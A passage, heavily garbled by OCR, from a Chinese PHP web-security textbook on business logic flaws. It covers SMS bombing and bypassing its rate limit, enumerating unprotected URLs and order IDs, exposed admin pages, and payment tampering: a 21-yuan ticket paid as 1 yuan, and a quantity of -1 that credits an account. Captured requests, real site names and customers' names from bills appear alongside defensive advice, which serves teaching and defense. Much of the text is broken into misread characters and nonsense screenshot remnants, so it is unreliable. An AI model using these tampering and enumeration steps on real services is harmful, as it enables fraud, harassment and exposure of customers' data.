图 3-18 流程 示例 
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2. 短信 讼 炸 平台 案例 


在 谷歌 中 搜索 “短信 又 炸 机 ”会 出 来 很 多 结果 ,在 网 站 的 主体 中 可 以 将 手机 号 码 输 入 到 
输入 框 中 ， 单 击 “开始 户 炸 ”按钮 ， 如 图 3-19 所 示 。 随 后 手机 便 开始 不 断 地 出 现 短 信 ， 短 
短 一 分 钟 便 收 到 近 20 条 短信 , 发 送 短信 的 号 码 多 为 106 开头 , 其 中 以 10655622 和 10653835 
两 个 号 码 发 送 的 短信 最 为 频繁 。 在 两 分 钟 内 ， 类 似 的 垃圾 短信 总 共 出 现 34 条 ， 而 发 送 的 内 
容 全 是 各 大 网 站 的 注册 验证 码 或 激活 码 。 








图 3-19 短信 短 炸 机 
这 对 用 户 来 说 个 人 生活 会 受到 骚扰 , 对 企业 来 说 则 可 能 造成 负面 影响 ,而 很 多 小 公司 因 
为 短信 接口 被 大 量 调用 ， 还 会 出 现 运营 问 题 。 在 公司 没有 安全 工程 师 的 情况 下 ， 一 般 都 是 业 
务 方 发 现 数据 异常 向 上 汇报 ， 最 后 和 开发 一 起 反 溯 才 会 找到 这 些 问题 。 而 在 这 段 时 间 内 ， 企 
业 所 蒙受 的 损失 是 无 法 挽回 的 。 


3. 短信 频率 限制 绕 过 案例 ) 





2014 年 4 月 ， 白 帽子 “计算 姑 ” 提 交 漏 洞 “ 某 站 短信 码 炸 加 电话 友 炸 ”。 
缺陷 编号 : wooyun-2014-049580。 


问题 出 现 的 URL 为 : http://localhost.com/phone/。 在 页 面 的 表单 中 填写 手机 号 码 后 ， 单 


击 “ 获 取 验 证 码 ”按钮 ， 手 机 就 会 收 到 短信 验证 码 ， 同 时 还 会 有 电话 打 过 来 ， 在 图 3-20 中 
可 以 看 到 界面 上 做 了 限制 ，60 秒 才 可 以 发 送 一 次 。 





1380013**** 


en ls 


图 3-20 ”获取 短信 验证 码 有 时 间 限 制 











113 


PHP Web 安全 开发 实战 





不 过 此 限制 只 限制 ， 在 白 帽 子 使 用 burpsuite 抓 包 后 ， 其 中 的 repeater 工具 还 是 
持续 发 送 的 。 
在 图 3-21 中 可 以 看 到 status 状态 为 1， 代表 短信 已 经 发 送 成 功 。 
[一 -一 有 -一 | 
Request 
















sinndmhcEbonspe5hbrclhb5; YP_think language= 
ne feab5 E98970bebs0le007éd129%32; Hm lvt, 885-691521651baceboo7aoz 
om_lpvc : ee 全 人 Hm_lvt_bé70£33Eb7d73a483563bge37| 
Fem_lpvt -bs70t336b7d73a463563bBe370bDe45d=13903! 


Popile= gmp cacc-oec_ verity codecaourceld=1l 














NT 
ache, must-revalidate, post-check=D, pre-cher 





ck=0 





图 3-21 反复 发 送 短信 依然 成 功 
过 不 了 多 长 时 间 ， 白 帽子 的 手机 就 会 响起 来 了 。 
4. 防范 方法 








这 里 主要 针对 两 种 攻击 场景 来 进行 防御 ,第 一 种 是 对 单 用 户 的 短信 色 炸 , 即 重复 发 送 请 
求 且 phoneNum 为 一 个 值 ; 第 二 种 是 对 多 用 户 发 送 短信 骚扰 的 场景 ， 即 将 phoneNum 人 参数 设置 
为 字典 ， 重 复 短信 接口 。 

设置 发 送 间 隔 ， 即 单一 用 户 发 送 请 求 后 ， 与 下 次 发 送 请 求 的 时 间 需 要 间隔 60 秒 。 

设置 单 用 户 发 送 上 限 ， 即 设置 每 个 用 户 单位 时 间 内 发 送 短信 数 的 上 限 ， 如 果 超 过 阔 值 ， 
就 不 允许 今天 再 次 调用 短信 接口 〈 浆 值 根据 业务 情况 设置 ) 。 

设置 单 耳 发送 上 限 ， 这 种 情况 是 预防 第 二 种 攻击 场景 的 ， 由 于 耳 的 特殊 性 ， 可 能 存在 所 
处 耻 是 大 出 口 ， 一 旦 误杀 ， 后 果 会 很 严重 ， 所 以 这 个 限制 要 根据 自身 情况 酌情 考虑 。 对 于 有 
风 控 的 团队 来 说 ， 当 发 现 发 送 耻 存在 异常 时 ， 可 以 对 该 耻 增 加 二 次 认证 来 防止 机 器 操作 ， 也 
可 以 降低 误杀 情况 。 

鉴于 短信 和 猴 炸 的 发 起 一 般 都 是 服务 器 行为 ， 还 可 以 采用 如 下 综合 手段 进行 防御 。 


114 


第 3 章 业务 逻辑 安全 


(1) 增加 图 片 验 证 

攻击 者 通常 会 采用 自动 化 工具 来 调用 “动态 短信 获取 ”接口 进行 动态 短信 发 送 , 原因 主 
要 是 攻击 者 可 以 自动 对 接口 进行 大 量 调用 ， 而 且 利用 成 本 比较 低 。 

采用 图 片 验 证 码 可 有 效 防 止 工具 自动 化 调用 ， 即 当 用 户 进 行 “ 获 取 动态 短信 ”操作 前 ， 
弹出 图 片 验证 码 ， 要 求 用 户 输入 验证 码 后 ， 服 务 器 端 再 发 送 动态 短信 到 用 户 手机 上 ， 该 方法 
可 有 效 地 解决 短信 友 炸 问题 。 

安全 的 图 片 验证 码 必须 满足 如 下 防护 要 求 。 

多 生成 过 程 安全 : 图 片 验证 码 必须 在 服务 器 端 产生 与 校 验 。 

多 使 用 过 程 安全 : 单 次 有 效 ， 且 以 用 户 的 验证 请 求 为 准 。 

9 验证 码 自身 安全 : 不 易 被 识别 工具 识别 ， 能 有 效 防止 暴力 破解 。 

图 片 验证 的 示例 如 图 3-22 所 示 。 








13700000000 





Pees 


点 击 图 片 剧 新 验证 码 





图 3-22 图 片 验 证 示例 


(2) 单 全 请 求 次 数 限制 

使 用 图 片 验 证 码 能 有 效 防止 攻击 者 进行 “动态 短信 ”功能 的 自动 化 调用 , 但 若 攻击 者 忽 
略图 片 验 证 码 验 证 错误 的 情况 ， 大 量 执行 请 求 会 给 服务 器 带 来 额外 负担 ， 影 响 业 务 使 用 。 建 
议 在 服务 器 端 限制 单个 Pp 在 单位 时 间 内 的 请 求 次 数 , 一 旦 用 户 请 求 次 数 ( 包 括 失败 请 求 次 数 ) 
超出 设 定 的 阐 值 , 就 暂停 对 该 IP 一 段 时 间 的 请 求 , 车 情节 特别 严重 , 则 可 以 将 IP 加 入 黑 名 单 ， 
禁止 该 人 的 访问 请 求 。 该 措施 能 限制 一 个 IP 地 址 的 大 量 请 求 ， 避 免 攻 击 者 通过 同一 个 IP 对 大 
量 用 户 进 行 攻击 ， 增 加 攻击 难度 ， 保 障 业 务 的 正常 开展 。 

(3 ) 限制 发 送 时 长 

建议 采用 限制 重复 发 送 动态 短信 的 间隔 时 长 ， 即 当 单 个 用 户 请 求 发 送 一 次 动态 短信 之 
后 ， 服 务 器 端 限制 只 有 在 一 定时 长 之 后 〈 此 处 一 般 为 60 秒 ) 才能 进行 第 二 次 动态 短信 请 求 。 
该 功能 可 进一步 保障 用 户 体验 ， 并 避免 包含 手工 攻击 、 恶 意 发 送 垃圾 验证 短信 。 

完整 的 动态 短信 验证 码 使 用 流程 如 图 3-23 所 示 。 
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1 用 户 访问 页 面 





4. 用 户 按 要 求 填写 手机 号 ， 图 片 验证 码 









8. 用 户 填写 动态 短信 进行 认证 6 .手机 号 、 ES 





9 .发 送 用 户 基 于 动态 短信 的 认证 请 求 





11. 返回 用 户 动态 短信 认证 结果 


10 婚 回 用 户 动态 短信 认证 结果 


7 向 用 户 发 庆 动 态 认 ii 信 动态 反 信 小 证 服务 器 
图 3-23 动态 短信 验证 码 使 用 流程 
5. 小 结 


有 些 数据 虽然 是 可 以 公开 的 ， 但 是 不 能 让 对 方 直接 调用 你 的 接口 获取 数据 ， 而 是 需要 增 
加 一 些 调用 成 本 ,否则 你 的 数据 可 能 会 被 有 心 人 随意 利用 ， 甚 至 通过 你 的 接口 来 做 一 个 山寨 
的 系统 。 


越权 漏洞 是 Web 系 统 中 一 种 常见 的 安全 漏洞 ， 主 要 原因 是 开发 者 在 对 数据 进行 增 、 删 、 
改 、 查 询 时 ， 对 客户 端 请 求 的 数据 遗漏 了 权限 的 判定 。 

账户 越权 是 指 攻击 者 能 够 执行 本 身 没有 资格 执行 的 一 些 操作 ， 通 俗 来 说 ， 越 权 就 是 “ 超 
越 了 你 拥有 的 权限 ， 做 了 你 本 来 不 可 能 做 的 事情 ”。 
3.4.1 未 授权 访问 

1. 漏洞 成 因 


当 开发 者 未 考虑 到 用 户 是 否 经 过 登录 或 认证 的 情况 下 直接 返回 敏感 数据 , 我 们 称 之 为 未 
授权 访问 漏洞 。 
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假设 有 一 个 URL 是 http://www.localhost.com/getUserInfo.php?uid=100, 在 这 个 URL 中 可 以 
看 出 后 端 通过 uid 的 参数 值 返回 相应 的 用 户 信息 。 如 果 这 个 接口 没有 做 用 户 登 录 验 证 或 者 管 
理 员 的 身份 验证 ， 那 么 所 有 人 都 能 访问 到 ， 很 有 可 能 导致 用 户 信息 可 以 被 般 历 输出 。 


2. 可 预测 的 URL〈 案 例 ) 


2016 年 2 月 , 白 帽子 “路 人 甲 ” 提 交 漏洞 “ 某 系 统 接口 未 授权 访问 泄露 姓名 /账单 信息 ”。 

缺陷 编号 : wooyun-2016-0206754。 

白 帽子 收 到 此 系统 的 两 条 短信 通知 ,在 短信 内 容 中 有 一 个 URL 地 址 : http://localhost.cn/ 
QUQMe39Fg7al0sjM， 当 通过 浏览 器 打开 此 URL 后 ， 会 被 跳 转 到 另 一 个 URL: 
https://pbdw.ebank.localhost.com/cbmchart/servlet/HSServlet?clientid=9Fg7al0sjM&prjNbr=726 
09， 页 面 的 内 容 是 账单 的 还 款 金额 ， 如 图 3-24 所 示 。 

另 一 条 短信 中 也 有 一 个 URL 地 址 : http://localhost.cn/njVmvJ9FnBul0sNM， 在 浏览 器 中 
打开 后 ,同样 会 被 跳 转 , 跳 转 的 URL 地 址 为 :https://pbdw.ebank.localhost.com/cbmchart/servlet/ 
H5Servlet?clientid=9FnBul0sNM&prjNbr=72608。 在 此 URL 中 所 看 到 的 内 容 如 图 3-25 所 示 。 


RED 





[oo 





对 吾 的 手 吉 先生 ， 您 的 2016 年 05 月 账单 已 出 
到 期 还 款 日 


05 月 26 日 


本 期 应 还 金额 


:953.48 


尊敬 的 伍 冬 萍 女士 ， 您 的 2016 年 05 月 账单 己 出 : 


到 期 还 款 日 


05 月 26B 


本 期 应 还 金额 














图 3-24 账单 的 还 款 金额 图 3-25 URL 显示 的 内 容 


充满 好 奇 心 的 白 帽子 很 快 觉得 不 对 劲 , 没有 登录 直接 看 账单 金额 , 是 如 何 保证 其 安全 性 
的 呢 ? 
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带 着 这 个 疑问 ， 白 帽子 对 两 个 URL 进行 了 对 比 ， 首 先 对 比 的 是 两 条 短信 中 的 URL， 分 
别 是 “http://localho.cn/QUQMe39Fg7al0sjM” 与 “http://local.cn/njVmvJ9FnBul0sNM”, 不 
过 发 现 两 个 URL 差异 太 大 ， 于 是 放弃 了 比较 。 

接 下 来 白 帽 子 又 对 跳 转 后 的 URL 进行 了 比较 ， 两 个 URL 分 别 是 
“https:/pbdw.ebank.localhost.com/cbmchart/servleUHSServlet?clientid=9Fg7al10sjM&priNbr=72609 ” 
与 “ https://pbdw.ebank.localhost.com/cbmchart/servlet/HSServlet?clientid=9FnBul0sNMe&prjNbr= 
72608”。 通 过 比较 发 现 URL 的 参数 并 不 大 ， 通 过 排除 法 发 现 参数 ptjNbr 有 没有 效果 都 一 
样 。 现 在 白 帽 子 已 经 知道 两 个 URL 的 唯一 区 别 就 是 clientid 值 。 

于 是 再 次 对 这 两 个 URL 中 的 参数 值 做 了 对 比 ， 值 的 内 容 分 别 是 “9Fg7al0sjM” 与 
“9FnBul0sSNM”。 发 现 只 有 4 个 字符 有 区 别 ， 此 时 攻击 者 使 用 遍历 的 方法 很 容易 就 可 以 收 
集 到 这 些 数 据 。 

3. 防范 方法 

在 类 似 不 需要 进行 登录 验证 就 可 以 访问 的 URL 地 址 , 应 该 要 充分 考虑 被 攻击 者 遍历 访问 
的 可 能 性 ， 如 上 述 案 例 中 应 该 在 参数 clientid 中 增加 值 的 不 可 预测 性 。 

3.4.2 水平 越权 

1. 漏洞 成 因 

水 平 越权 是 指 同 一 种 类 型 的 用 户 能 访问 一 组 相同 类 型 的 资源 时 所 造成 的 漏洞 。 比 如 在 一 
个 订单 系统 中 ， 正 常 来 说 每 个 用 户 只 能 看 到 自己 的 订单 信息 ， 也 只 能 操作 自己 的 订单 ， 如 果 
攻击 者 能 查看 其 他 用 户 的 订单 信息 ， 就 存在 水 平 越权 漏洞 。 

比如 商城 系统 中 的 订单 列表 ， 用 户 可 以 从 “我 的 订单 列表 ”中 找到 订单 详情 页 URL, 而 
详情 页 URL 地 址 为 http://www.localhost.test/order.php?orderid=10331。 

当 这 个 地 址 被 用 户 访问 后 , 后 端的 逻辑 会 去 查询 数据 库 , 查询 的 SQL 语 句 可 能 是 这 样 的 : 
select * from order where order id=10331。 在 这 条 SQL 语句 中 ， 可 以 看 到 只 有 订单 ID 的 限制 ， 
而 没有 uid 的 限制 ， 这 样 就 会 造成 水 平 越权 漏洞 ， 设 想 如 果 攻 击 者 把 这 个 订单 ID 一 个 个 遍历 
访问 ， 就 会 把 所 有 订单 信息 疏 取 出 来 。 

2. 订单 平行 越权 《〈 案 例 ) 

2016 年 2 月 ， 和 白 帽子 “hecate” 提 交 漏洞 “ 某 站 越权 查看 订单 ”。 

缺陷 编号 : wooyun-2016-0206705 。 


此 系统 是 一 个 电影 票 销售 平台 ， 白 帽子 在 使 用 iOS 的 App 的 过 程 中 ， 通 过 burisuite 抓 
包 ， 发 现 了 两 处 订单 信息 越权 漏洞 。 
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下 面 的 文本 是 白 帽 子 所 抓 的 数据 包 ， 从 数据 包 中 可 以 看 到 是 一 个 get 型 请 求 ，URL 中 只 
有 一 个 goodsOrderld 参数 : 


GET /ECommerce/GoodsOrderInfo.api2goodsOrderId=7708428 HTTP/1.1 

Host: api.m.mtime.cn 

X-MTime-Mobile-CheckValue: 5,1462780658496,80CB2F439COF418EB3CBD657223B3620 

Proxy-Connection: keep-alive 

Accept-Encoding: gzip 

Cookie: loginEmail=wooyun 222%40163.com; autoExit=;_mi = 
411530972117512131043048311531065.16050915425546866C52C46202E4F5FA1B36 

Connection: keep-alive 

X-Mtime-Mobile-DeviceInfo: iPad3,5 

User-Agent: Mtime iOS App 9.2.4 


白 帽子 猜想 既然 只 有 一 个 参数 ， 是 否 存在 水 平 越权 漏洞 呢 通过 burp suite 遍历 多 个 
goodsOrderId 值 来 获取 不 同 的 订单 信息 ， 如 图 3-26 和 图 3-27 所 示 。 




















wwwwooyunorgj 





图 3-26 goodsOrderId 为 7708443 时 返回 的 订单 数据 


ET araee hpyaptmmaimemn 国 国 
EC Je 
eT /ecommerce Geo Or Toro I 

















‘5.1482780658496 80 CE2F439COF 


























图 3-27 goodsOrderld 为 7701548 时 返回 的 订单 数据 
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从 图 3-26 和 图 3-27 可 以 看 出 ， 对 于 不 同 的 参数 ， 接 口 返回 了 不 同 的 订单 信息 ， 而 这 些 
订单 并 不 是 白 帽 子 本 人 的 ， 因 此 可 以 得 出 此 接口 存在 水 平 越权 漏洞 。 

3. 防范 方法 

对 于 一 些 敏感 的 数据 , 在 防御 上 需要 先 验证 用 户 身份 后 再 做 查询 处 理 , 比如 上 面 的 两 处 


订单 信息 ， 必 须 在 查询 条 件 中 加 入 uid 信 息 ， 如 select * from order where uid=100 and orderid = 
10000。 另 外 ， 这 个 uid 不 能 由 前 端 传 递 过 来 ， 而 应 该 由 后 端 从 Session 中 获取 。 


3.4.3 ”垂直 越权 
1. 漏洞 成 因 
垂直 访问 控制 是 指 允 许 不 同类 型 的 用 户 访问 不 同 的 功能 时 所 产生 的 权限 问题 .比如 在 某 


系统 中 ， 普 通用 户 只 能 执行 有 限 的 操作 ， 管 理 员 则 拥有 最 高 权限 。 而 攻击 者 作为 一 个 普通 用 
户 ， 能 够 执行 他 并 不 具备 的 权限 ， 这 就 说 明 系 统 存在 垂直 越权 漏洞 。 


2. 后 台 系 统 未 授权 访问 〈 案 例 ) 


2013 年 3 月 ， 白 帽子 “我 太 Yin 荡 了 ”提交 漏洞 “ 某 网 站 后 台 越 权 操作 ”。 

缺陷 编号 : wooyun-2013-037209。 

白 帽子 在 使 用 其 业务 的 时 候 , 对 系统 安全 做 了 一 番 检 测 , 首先 利用 搜索 引擎 的 语法 查询 
了 管理 后 台 信 息 ， 如 图 3-28 所 示 。 





site-airchina.com.cn admin 


网 页 。 图 片 ”地 图 。 更 多 ~ 搜索 工具 


国航 知音 


fp airchina com cn/admin/main jsp ~ 
升级 公示 . 您 好 . 您 的 登陆 密码 在 新 系统 中 被 统一 初始 化 为 admin (小写) ， 请 登陆 后 立即 
修改 您 的 密码 。 新 系统 中 会 员 录 入 功能 链接 … 


Admin Help Submenu 
e-leamn.airchina com.cn/ilearm/en/shared/.. /admin_help_submenuy. html ~ 


50+ 项 - 帮助 . 内 容 管理 , 发 布 内 容 
管理 内 容 定义 播放 器 先决 条 件 
使 用 内 容 类 型 ”制定 参考 材料 


活 8 
fip airchina com cnicn/admin/user/activity/activity jsp ~ 
类 别 . 语言. 简体 . 繁体 . 英文 . 航空 促销 活动 . 酒店 促销 活动 . 租车 促销 活动 . 其 他 促销 活动 


图 3-28 通过 搜索 引擎 找到 了 网 站 的 后 台地 址 
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在 搜索 结果 中 找到 了 一 条 URL 路 径 中 包含 admin 的 页 面 ， 白 帽子 猜测 这 些 页 面 可 能 为 
其 管理 页 面 。 

打开 其 中 的 活动 页 面 ， 看 到 如 图 3-29 所 示 的 页 面 ， 可 以 看 到 有 添加 、 修 改 、 删 除 等 功 
能 ， 并 可 以 进行 操作 。 








TAN 
村 as 
Cpr 
Sa 
DD SEEY /FR GS WS EN EO ED SE wom a 
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本 地 use Bw = se 
, C3 es Bn] ey Ws eg 
Ew 








图 3-29 网 站 管理 后 台 页 面 


3. 防范 方法 

在 后 台 系 统 中 , 通常 开发 者 会 让 所 有 页 面 都 继承 一 个 全 局 的 验证 权限 方法 , 但 由 于 页 面 
过 多 可 能 会 遗漏 其 中 的 某 一 个 页 面 ， 从 而 造成 上 面 案 例 中 的 情况 。 因 此 ， 笔 者 建议 后 台 系统 
不 要 与 前 台 业 务 共用 一 个 域名 。 
3.4.4 小 结 

本 节 介 绍 的 是 一 些 罗 辑 性 的 漏洞 ， 具 体 什 么 数据 需要 验证 ， 什 么 数据 不 需要 验证 ， 在 代 
码 层 是 无 法 知道 的 ， 需 要 人 为 主观 上 来 做 出 判断 ， 一 般 涉 及 的 用 户 信息 (包括 订单 、 个 人 资 
料 等 ) 通常 都 会 要 求 进行 数据 验证 。 

越权 漏洞 不 仅 出 现在 展示 的 地 方 , 只 要 是 对 数据 有 增 、 删 、 改 、 查 的 地 方 都 有 可 能 出 现 。 


3.5 支付 漏洞 


随 着 移动 支付 的 普及 , 越 来 越 多 的 人 习惯 在 网 上 购物 , 大 量 的 电 商 网 站 都 可 以 用 在 线 支 
付 完成 交易 。 而 在 线 支付 必然 涉及 在 线 支付 的 流程 ， 这 里 面 存在 很 多 逻辑 问题 。 由 于 涉及 到 
金钱 ， 如 果 设 计 不 当 ， 很 有 可 能 会 产生 诸如 0 元 购买 商品 之 类 的 严重 漏洞 。 
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很 多 人 对 支付 漏洞 的 理解 通常 都 是 自 改 商品 价格 , 已 有 的 对 支付 漏洞 的 总 结 也 是 对 现 有 
的 一 些 案例 的 经 验 式 归 类 , 没有 上 升 到 对 在 线 支付 流程 深入 分 析 的 层面 。 本 节 尝 试 从 分 析 在 
线 支付 流程 、 在 线 支 付 厂商 的 接 入 方式 开始 , 深入 分 析 整 个 在 线 交 易 流程 中 容易 出 现 的 安全 
问题 。 


3.5.1 支付 流程 分 析 
1. 支付 流程 分 析 
从 功能 上 来 说 , 在 线 支付 是 通过 支付 宝 的 支付 渠道 , 付款 者 直接 汇款 给 另 一 个 拥有 支付 


宝 账号 的 收 款 者 ， 其 支付 流程 如 图 3-30 所 示 。 
ee | 





4. 用户 已 付款 







2. 通 知 付款 


1. 提 交 订单 


图 3-30 在线 支 付 流程 


图 3-24 的 支付 流程 说 明 如 下 : 

(1) 用 户 提交 需要 购买 的 商品 、 数 量 、 收 货 地 址 、 收 件 人 等 信息 。 

(2) 商家 收 到 信息 之 后 ， 保 存 订单 ， 并 返回 付款 地 址 给 用 户 付款 。 

(3) 用 户 去 支付 平台 付款 。 

(4) 用 户 付款 后 ， 支 付 平台 返回 处 理 的 结果 数据 ， 对 于 处 理 完 成 的 交易 ， 支 付 宝 会 以 
两 种 方式 把 数据 反馈 给 商户 网 站 。 程序 上 自动 重新 构造 URL 地 址 链接 , 在 用 户 当前 页 面 通过 
自动 跳 转 的 方式 跳 回 商户 在 请 求 时 设 定好 的 页 面 路 径 地 址 〈 参 数 为 return_url， 如 果 商 户 没 有 
设 定 ， 就 不 会 进行 该 操作 ) ， 支 付 宝 服务 器 主动 发 起 通知 ， 调 用 商户 在 请 求 时 设 定好 的 页 面 
路 径 〈 参 数 为 notify_url， 如 果 商 户 没有 设 定 ， 就 不 会 进行 该 操作 ) 。 

(5) 商户 对 获取 的 返回 结果 数据 进行 处 理 ， 同 步 通知 处 理 页 面 (参数 return_url 指定 页 
面 文件 ) 或 服务 器 异步 通知 页 面 (参数 notify_url 指定 页 面 文件 ) 获取 支付 宝 返 回 的 结果 数 
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据 后 , 可 以 结合 自身 网 站 的 业务 逻辑 进行 数据 处 理 (如 订单 更 新 、 自 动 充 值 到 会 员 账 号 等 ) 。 

通过 上 面 的 流程 可 以 总 结 一 下 大 致 步骤 , 用 户 提交 订单 信息 , 应 用 端 生成 支付 的 请 求 链 
接 ， 返 回 给 用 户 浏览 器 ,用户 浏览 器 请 求 支付 宝 接口 ， 进 入 支付 流程 ， 整 个 支付 的 环节 是 和 
支付 宝 端 交互 ， 支 付 完成 之 后 ,支付 宝 通 过 通知 接口 给 应 用 发 送 支付 成 功 的 通知 。 应 用 通过 
支付 宝 的 通知 信息 来 判断 支付 是 否 成 功 。 

2. 可 能 的 风险 

风险 最 主要 在 第 一 步 ， 用户 提交 订单 位 置 , 对 于 交易 业务 功能 来 说 ， 后 端 只 需要 用 户 提 
供 商品 ID 和 商品 数量 就 可 以 满足 支付 所 需要 的 数据 。 而 一 些 开 发 者 为 了 方便 或 者 画蛇添足 造 
成 了 一 些 漏洞 ， 主 要 有 以 下 几 种 : 

(1) 直接 把 订单 的 总 金额 从 客户 端 获取 ， 放 在 了 构造 的 请 求 交易 数据 中 。 

(2) 虽然 只 传递 商品 ID 和 数量 ， 但 是 数量 没有 做 白 名 单 限制 ， 造 成 可 以 输入 负数 或 者 
大 数 计算 溢出 ， 导 臻 最终 计算 的 订单 金额 出 现 错误 。 

(3) 除了 商品 数量 和 商品 ID 外 ， 还 有 其 他 参与 订单 金额 计算 的 参数 从 客户 端 获取 ， 比 
如 运费 等 。 


3.5.2 ”金额 数据 段 改 


一 些 购 物 网 站 在 支付 时 使 用 前 端 传 过 来 的 金额 , 并且 没 有 对 金额 进行 验证 ， 导 致 金额 数 
据 自 改 的 产生 ， 而 正常 的 操作 应 该 是 在 后 端 计算 订单 金额 。 


1. 验证 方法 


在 购买 或 充值 的 位 置 做 测试 ， 比 如 对 提交 订单 的 请 求 进行 抓 包 ， 如 果 里 面 有 金额 字段 ， 
就 修改 金额 等 字段 ， 例 如 在 支付 页 面 抓 取 请 求 中 商品 的 金额 字段 ， 修 改 成 任意 数额 的 金额 并 
提交 ， 查 看 能 否 以 修改 后 的 金额 数据 完成 业务 流程 。 


2. 订单 支付 金额 自 改 案例 ) 

2015 年 11 月 ， 白 帽子 “小 乌云 ”提交 “ 某 站 订单 支付 时 的 总 价 未 验证 漏洞 (支付 逻辑 
漏洞 )”， 这 是 一 个 非常 典型 的 金额 可 修改 漏洞 。 

缺陷 编号 : wooyun-2015-0117083 。 

受 影响 的 站 点 是 一 个 卖 汽 车 票 的 网 站 ， 白 帽子 在 购买 车 票 的 时 候车 票 金额 可 自 定义 修 
改 ， 如 图 3-31 所 示 ， 这 张 车 票 的 面值 是 21 元 。 
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pay.12308.com/toPay.htm?orderNo 









车 票 信息 元 二 站 一 后 肚 庄 次 : 一。 发 车 时 间 : 2015-05-31 07:05 





银行 卡 /储蓄 卡 信用 卡 
旧 扫 码 快捷 支付 
去, 微 信 支付 加 QQ 钱包 
旧 在 线 支付 平台 
ae 广 ( 屠 fy 


四 网 上 银行 ( 银联 ) 


人 











图 3-31 车 票 的 面值 


在 单 击 “ 确 认 支 付 ”按钮 后 , 使 用 burp suite 抓 包 , 在 数据 包 中 发 现 total_fee 参数 为 21， 
根据 参数 名 称 和 值 做 出 判断 ， 应 该 是 一 个 支付 金额 ， 于 是 把 金额 改 成 如 图 3-32 所 示 的 结果 。 


POST /aliPay. htm HTTP/1. 1 
Host: pay. 12308. com 








Proxy-Conneetion: keep-alive 
Content-Length: 209 

Cache-Control: max-age=0 

Accept: text/html,application/xhtml+xml,application/xml;q=0. 9, image/webp, */*;q=0.8 


Origin: http://pay. 12308. com 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KiTML, like Gecko) Chrome/42.0.2311.90 Safari/531 
Content-Type: application/x-www-form-urlencoded 
Referer: http://pay. 12308. com/toPay. htm?orderNo: 
Accept-Encoding: gzip, deflate 

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4 





215123081609585 


















Cookie: sgsa_id=12308. com|14 ; LN="1678547479@ om: + 14166CC1A5934CDO3E352035DAA266BA7DD58FEBAB75EA1E"; 
JSESSIONID=F320DFA5B41B9393 sgsa_vt_226089_232537=1432921764654; 
Hm_lvt_7Taeggeg， 45dc624baf 1432916406 1432916701; Hm_lpvt_7ac99e8c2df45dc624bafedd8216c545=1 





SERVERID=498b 





aclce58945a. 





orde 1492185 


re 





derN0=0215123081609585&o; 3081609585&phone=&subject=%E6%B1%BDWES%BDWA6 
ainingTime=599&k_phone=&k_code=&bank=aliPay 














图 3-32 更改 金额 
如 图 3-33 所 示 ， 可 以 看 见 支付 金额 已 经 变 成 了 一 元 钱 。 
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正在 使 用 即时 到 账 交易 [] 
人 1.00 元 
12308 全 国 汽车 票 收 戎 方 : 深圳 市 一 二 三 委 作 
手机 不 在 身边 ? 


[zs] 
EExd 





打开 支付 宝 钱包 
扫 一 拉手 续 付 








图 3-33 ”金额 变 成 一 元 钱 
3. 防范 方法 
订单 支付 金额 不 应 该 由 前 端 传 到 服务 器 中 , 而 是 后 端 通过 商品 、 数 量 等 信息 计算 好 后 再 
去 支付 。 
3.5.3 ”商品 数量 算 改 
1. 漏洞 原因 
购买 商品 的 时 候 通常 有 一 个 数量 选项 , 用 户 可 以 对 商品 的 数量 做 加 减 , 通常 在 前 端 会 限 


制 商品 不 能 为 0， 但 是 开发 者 在 后 端 却 没有 做 出 相应 限制 ， 这 就 导致 攻击 者 可 以 通过 修改 数 
据 包 造成 商品 数量 小 于 1。 


2. 测试 方法 

依然 是 在 提交 订单 时 抓 包 修改 商品 数量 等 字段 ， 将 请 求 中 的 商品 数量 修改 成 任意 数额 
(比如 负数 〉 并 提交 ， 查 看 能 否 以 修改 后 的 数量 完成 业务 流程 。 

3. 商品 数量 修改 (案例 ) 

2015 年 4 月 ， 白 帽子 “Yogy” 提 交 漏洞 “ 某 团购 网 站 支付 逻辑 漏洞 (可 负数 支付 ) ”。 

缺陷 编号 : wooyun-2015-0109037。 


该 厂商 有 一 个 团购 的 商城 系统 ， 可 在 其 平台 购买 商品 ， 确 定 订单 信息 界面 ， 如 图 3-34 
所 示 ， 可 以 看 到 订单 信息 中 包含 数量 、 价 格 、 快 递 和 总 价 几 项 。 
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提交 订单 


现价 299 元 全 国 包 裔 ! 原价 988 元 大 
中 国文 化 共 书 套装 全 24 骨 , 套 书 齐 绍 
了 中 国 的 政治 演进 ， 历 代 军 事 . 经济 
币 史 、 文 学 精华 、 科 技 成 就 ， 历 代 名 
人 ， 医 学 文化 . 民 俊文 化 . 考古 发 

现 ， 自然 地 理 等 ， 全 彩印 刷 图 文 并 

芒 , 极 具 收藏 的 一 套 中 国文 化 百科 全 
书 ! 


x ¥299 +¥0 = ¥299 





然后 9 新 本 页 使用 余 詹 支付 ) 当前 账户 余 类 9.90 元 ， 使 用 条 撕 付 称 后 
还 应 支付 金额 : ¥ 289.1 元 


(地 果 在 疙 支付 有 限 娄 ， 可 先 分 多 次 班 





请 选择 支付 方式 : 





到 iT 





图 3-34 订单 信息 界面 


单 击 “ 确 认 生成 订单 ， 进 入 付款 页 ”按钮 之 后 ， 抓 取 到 如 图 3-35 所 示 的 数据 包 ， 其 中 
有 一 个 num 参数 ， 攻 击 者 把 参数 尝试 改 为 -1， 修 改 完 成 之 后 发 送 数据 包 。 





------ WebKitFormBoundaryWSxaeFKVZJHSaiWR 
Content-Disposition: form-data; name="FORMHASH” 


ag985d1idbb8700f0 
| WebKitFormBoundaryWSxaeFKVZ]JHSaiWR 
Content-Disposition: form-data; name="paytype"” 


-=----- WebKitFormBoundaryWSxaeFKVZ]HSaiWR 
Fontent-Disposition; form-data; name="num” 


-| WebKitFormBoundaryWSxaeFKVZ]JHSaiWR 
Content-Disposition: form-data; name="id” 


3-35 ” 怜 取 到 的 数据 包 


现在 可 以 在 订单 列表 中 看 到 如 图 3-36 所 示 的 订单 。 











图 3-36 订单 列表 
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付款 后 ， 可 以 看 到 账户 余额 增加 了 299 元 ， 如 图 3-37 所 示 。 


您 当前 的 帐户 余额 是 308.90 元 < 为. 户 人 > 





撞 要 日 其 会 给 (元 ) 
园丁 丙 品 201504.19 14417.43 二 289 - 


ED 201504.19 14:08:17 as - 
WwWwwooyun.org 





图 3-37 账户 余额 增加 了 
4. 防范 方法 
虽然 金额 是 经 过 服务 器 计算 的 ， 却 没有 对 相应 能 影响 价格 的 参数 做 限制 。 
3.5.4 ”运费 金额 修改 
1. 漏洞 成 因 


